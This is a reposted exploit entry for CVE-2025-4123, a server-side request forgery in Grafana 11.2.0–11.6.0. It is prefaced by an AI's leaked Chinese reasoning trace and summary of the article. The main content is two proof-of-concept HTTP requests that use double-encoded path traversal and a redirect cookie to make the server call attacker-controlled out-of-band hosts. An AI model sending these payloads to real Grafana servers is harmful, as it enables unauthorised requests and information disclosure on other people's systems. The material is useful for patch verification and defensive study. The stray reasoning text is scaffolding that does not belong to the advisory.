Grafana 11.6.0 SSRF
好的,我现在需要帮用户总结一篇关于Grafana 11.6.0版本SSRF漏洞的文章,控制在100字以内。首先,我得仔细阅读文章内容,理解主要信息。 文章标题是“Grafana 11.6.0 - SSRF”,提到了漏洞的存在。描述部分说明这是由于客户端路径遍历编码和开放重定向的组合导致的。影响范围包括版本11.2.0到11.6.0,并且当匿名访问或易受攻击的插件启用时,攻击者可以利用这个漏洞进行SSRF攻击,导致信息泄露。 接下来,我需要提取关键点:Grafana版本、漏洞类型(SSRF)、原因(路径遍历和重定向)、影响条件(匿名访问或插件)、可能的后果(信息泄露)。 然后,我得把这些信息浓缩成一句话,确保不超过100字,并且直接描述内容,不需要开头语。 可能会这样组织:“Grafana 11.2.0至11.6.0版本中存在SSRF漏洞,因客户端路径遍历和开放重定向导致。在匿名访问或易受攻击插件启用时,攻击者可引发服务器向其控制的主机发送请求或重定向,导致信息泄露。” 检查一下字数是否符合要求,并确保所有关键点都被涵盖。 </think> Grafana 11.2.0至11.6.0版本中存在SSRF漏洞,因客户端路径遍历和开放重定向导致。在匿名访问或易受攻击插件启用时,攻击者可引发服务器向其控制的主机发送请求或重定向,导致信息泄露。 2026-4-9 20:52:38 Author: cxsecurity.com(查看原文) 阅读量:5 收藏

# Exploit Title: Grafana 11.6.0 - SSRF # FOFA: app="Grafana" # Date: 2-11-2025 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://grafana.com/ # Software Link: https://grafana.com/grafana/download # Version: 11.2.0 - 11.6.0 # CVE: CVE-2025-4123 Description: An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure. POC: GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Connection: close Accept-Encoding: gzip GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19 Connection: close Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f.. Accept-Encoding: gzip



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026040006
如有侵权请联系:admin#unsafe.sh